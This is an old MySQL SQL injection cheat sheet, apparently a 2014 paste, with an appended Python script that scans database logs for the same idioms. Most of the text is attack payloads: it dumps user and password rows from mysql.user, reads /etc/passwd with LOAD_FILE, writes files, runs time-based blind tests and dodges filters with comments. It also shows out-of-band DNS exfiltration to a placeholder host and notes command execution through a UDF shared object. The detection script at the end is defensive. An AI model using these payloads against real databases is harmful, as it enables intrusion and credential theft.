Googleinurl

[INFO]=> QUERYS SQL ~ INJECTION

Jul 16th, 2014
Version:
SELECT VERSION()
SELECT @@version
SELECT @@version_comment
SELECT @@version_compile_machine
SELECT @@version_compile_os

Directories:
SELECT @@basedir
SELECT @@tmpdir
SELECT @@datadir

Users:
SELECT USER()
SELECT SYSTEM_USER()
SELECT SESSION_USER()
SELECT CURRENT_USER()

Current Database:
SELECT DATABASE()

Concatenation:
SELECT CONCAT('foo','.','bar'); #Returns: foo.bar
SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Retu

Multi-Concat:
#Stacks the row "foo" from the table "bar" together, using the separa
#Note: This operation can by default only grab 1024 bytes, and do no
#The 1024 byte limit is stored in the @@group_concat_max_len variabl
SELECT GROUP_CONCAT(foo SEPARATOR '<br />') FROM bar

Better-Concat:
#CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROU
#Which therefore allows you to concat strings together up to the @@ma
#instead of @@group_concat_max_len. The default value for @@max_allo
#1048576 bytes, instead of @@group_concat_max_len's 1024.
SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name

Change Collation:
SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from
SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8.

Wildcards in SELECT(s):
SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all COLUMN(s) st
SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all COLUMN(s) en

Regular Expression in SELECT(s):
#Returns all columns matching the regular expression.
SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).*'

SELECT Without Duplicates:
SELECT DISTINCT foo FROM bar

Counting Columns:
SELECT COUNT(foo) FROM bar; #Returns the amount of rows "foo" from t

Get Amount of MySQL Users:
SELECT COUNT(user) FROM mysql.user

Get MySQL Users:
SELECT user FROM mysql.user

Get MySQL User Privileges:
SELECT grantee,privilege_type,is_grantable FROM information_schema.us

Get MySQL User Privileges on Different Databases:
SELECT grantee,table_schema,privilege_type FROM information_schema.sc

Get MySQL User Privileges on Different Columns:
SELECT table_schema,table_name,column_name,privilege_type FROM infor

Get MySQL User Credentials & Privileges:
SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Upd
Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,
File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_p
Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_
Repl_client_priv) FROM mysql.user

Get MySQL DBA Accounts:
SELECT grantee,privilege_type,is_grantable FROM information_schema.us
SELECT host,user FROM mysql.user WHERE Super_priv='Y'

Get Databases:
SELECT schema_name FROM information_schema.schemata
SELECT DISTINCT db FROM mysql.db
SELECT DISTINCT table_schema FROM information_schema.columns
SELECT DISTINCT table_schema FROM information_schema.tables

Get Databases & Tables:
SELECT table_schema,table_name FROM information_schema.tables
SELECT DISTINCT table_schema,table_name FROM information_schema.colu

Get Databases, Tables & Columns:
SELECT table_schema,table_name,column_name FROM information_schema.c

SELECT A Certain Row:
SELECT foo FROM bar LIMIT 0,1; #Returns row 0.
SELECT foo FROM bar LIMIT 1,1; #Returns row 1.
...
SELECT foo FROM bar LIMIT N,1; #Returns row N.

Benchmark (Heavy Query):
#Performs an MD5 calculation of "1" 10000 times.
SELECT BENCHMARK(10000,MD5(1))

Sleep:
#Works only in MySQL 5 and above.
#Sleeps for 5 seconds, returns 0 on success.
SELECT SLEEP(5)

Conversion (Casting):
SELECT CAST('1' AS UNSIGNED INTEGER); #Returns: 1
SELECT CAST('65' AS CHAR); #Returns: A

Substring:
SELECT SUBSTR('foobar',1,3); #Returns: foo

Hexadecimal Evasion:
SELECT 0x41424344; #Returns: ABCD
SELECT 0x2E; #Returns: .
SELECT 0x3A; #Returns: :

ASCII to Number:
SELECT ASCII('A'); #Returns: 65

Number to ASCII:
SELECT CHAR(65); #Returns: A
SELECT CHAR(89); #Returns: Y
SELECT CHAR(116,101,115,116); #Returns: test

If Statement:
#Returns 1 if the database is running MySQL 5.
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0);
#Returns 1 if the database is running MySQL 4.
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0);

Case Statement:
#Returns 1 if the database is running MySQL 5.
SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=53) THEN 1 ELSE 0 END
#Returns 1 if the database is running MySQL 4.
SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=52) THEN 1 ELSE 0 END

Read File(s):
#Requires you to have the File_priv in mysql.user. On error this stat
SELECT LOAD_FILE('/etc/passwd')

Write File(s):
#You must use quotes on the filename!
SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt'
SELECT IF((SELECT NULL INTO DUMPFILE '/tmp/test.txt')=NULL,NULL,'Hel

Logical Operator(s):
AND, &&; #The AND operator has && as an alternative syntax.
OR, ||;  #The OR operator has || as an alternative syntax.
NOT, !; #The NOT operator has ! as an alternative syntax.
XOR; #The XOR operator has no alternative syntax.

Fuzzy Code Comment:
#Code within /*! is executed by MySQL. Additional /*! can be
SELECT/*!CONCAT_WS(0x3A,user,host,password)/*!FROM/*!mysql.user*/

Comments:
SELECT foo, bar FROM foo.bar-- Single line comment
SELECT foo, bar FROM foo.bar/* Multi line comment */
SELECT foo, bar FROM foo.bar# Single line comment
SELECT foo, bar FROM foo.bar;%00 Batched query with additional NULL-

A few evasions/methods to use between your MySQL statements:
CR (%0D); #Carriage Return.
LF (%0A); #Line Feed.
Tab (%09); #The Tab key.
Space (%20); #Most commonly used. You know what a space is.
Multiline Comment (/**/); #Well, as the name says.
Fuzzy Comment (/*!); #Be sure to end your query with (*/)
Parentheses, ( and ); #Can also be used as separators when used right

Parentheses instead of space:
#As said two lines above, parentheses can be used as a sep
SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2))

Auto-Casting to Right Collation:
SELECT UNHEX(HEX(USER())); #UNHEX() converts the hexadecimal value(s)

DNS Requests (OOB (Out-Of-Band)):
#For more information check this.
SELECT YourQuery INTO OUTFILE '\\\\www.your.host.com\\?file_to_save_a

Command Execution:
#If you're on a MySQL 4.X server, it's possible to execute OS comman
#It can be done if you're able to upload a shared object into /usr/
#The file extension is .so, and it must contain a "User Defined Fun
#Get raptor_udf.c, it's the source code for just that feature.
#Remember to compile it for the right CPU architecture.
#The CPU architecture can be resolved by this query:
SELECT @@version_compile_machine;

A couple of useful blind queries to fingerprint the data
All of these return either True or False, as in, you either get a res
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53;
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52

Running as root:
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=U

Got File_priv:
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user
(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
LIMIT 0,1)=CHAR(89),1,0)=1

Got Super_priv (Are we DBA):
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql
(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
LIMIT 0,1)=CHAR(89),1,0)=1

Can MySQL Sleep:
#This query will return True and should take above 1 second to execut
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1

Can MySQL Benchmark:
SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1

Are we on *NIX:
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47

Are we on Windows:
SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=

Does a certain column exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information

Does a certain table exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM

Does a certain database exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db

from: h.ackack(dot)net
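As an added example (not part of the original paste), the following Python turns the sheet's idioms into detection logic: it scans MySQL general-log style lines for the time-delay, file-access, schema-enumeration, fingerprinting and separator-evasion patterns listed above, undoing the /**/, /*! and %xx tricks before matching. The indicator groups, the log line format and the sample log are constructed for this example.

```python
import re

# Idioms from the cheat sheet above, grouped by what a hit reveals. Group names
# and the regexes are this example's own constructions, not a vendor ruleset.
INDICATORS = {
    "time_based":    r"\b(?:SLEEP|BENCHMARK)\s*\(",
    "file_access":   r"\bLOAD_FILE\s*\(|\bINTO\s+(?:DUMPFILE|OUTFILE)\b",
    "schema_enum":   r"\binformation_schema\s*\.|\bmysql\s*\.\s*(?:user|db)\b",
    "fingerprint":   r"@@(?:version|datadir|basedir|tmpdir)\w*|\bVERSION\s*\(",
    "blind_compare": r"\bASCII\s*\(\s*SUBSTR",
    "hex_literal":   r"\b0x[0-9a-f]{2,}\b",
}
COMPILED = {n: re.compile(p, re.IGNORECASE) for n, p in INDICATORS.items()}
# Separator tricks are checked on the raw text, before normalisation removes them.
EVASION = re.compile(r"/\*!|/\*\*/|%00|--\s|\)\s*UNION\s*\(", re.IGNORECASE)

def normalise(sql: str) -> str:
    """Reduce the query to what MySQL executes: decode %xx escapes (keeping %00 as
    a marker), keep the body of /*! */ comments (MySQL runs it), drop plain /* */."""
    sql = re.sub(r"%(?!00)([0-9a-f]{2})", lambda m: chr(int(m.group(1), 16)), sql, flags=re.I)
    sql = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", sql, flags=re.S)
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    return re.sub(r"\s+", " ", sql).strip()

def classify(sql: str) -> list[str]:
    """Names of the indicator groups one query matches ([] for a benign query)."""
    hits = ["comment_evasion"] if EVASION.search(sql) else []
    norm = normalise(sql)
    return hits + [n for n, rx in COMPILED.items() if rx.search(norm)]

# Constructed general-log line shape: "<timestamp> <connection id> Query <sql>".
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+Query\s+(?P<sql>.*)$")

def scan_general_log(text: str) -> list[tuple[str, str, list[str]]]:
    """(timestamp, connection id, groups) for every logged query that hits."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (hits := classify(m.group("sql"))):
            findings.append((m.group("ts"), m.group("conn"), hits))
    return findings

# Constructed log excerpt: one benign query, then queries built from the idioms above.
SAMPLE_LOG = """\
2014-07-16T10:00:01 42 Query SELECT name FROM products WHERE id=17
2014-07-16T10:00:02 42 Query SELECT name FROM products WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1
2014-07-16T10:00:03 42 Query SELECT name FROM products WHERE id=(-1)UNION(SELECT(1),(2))
2014-07-16T10:00:04 42 Query SELECT/*!user/*!FROM/*!mysql.user*/
2014-07-16T10:00:05 43 Query SELECT name FROM products WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47
2014-07-16T10:00:06 43 Query SELECT name FROM products WHERE id=1 AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_name='users')>0
"""
```

Running `scan_general_log(SAMPLE_LOG)` flags the last five lines and leaves the first alone; in practice the connection id lets you join a hit back to the client address in the same log.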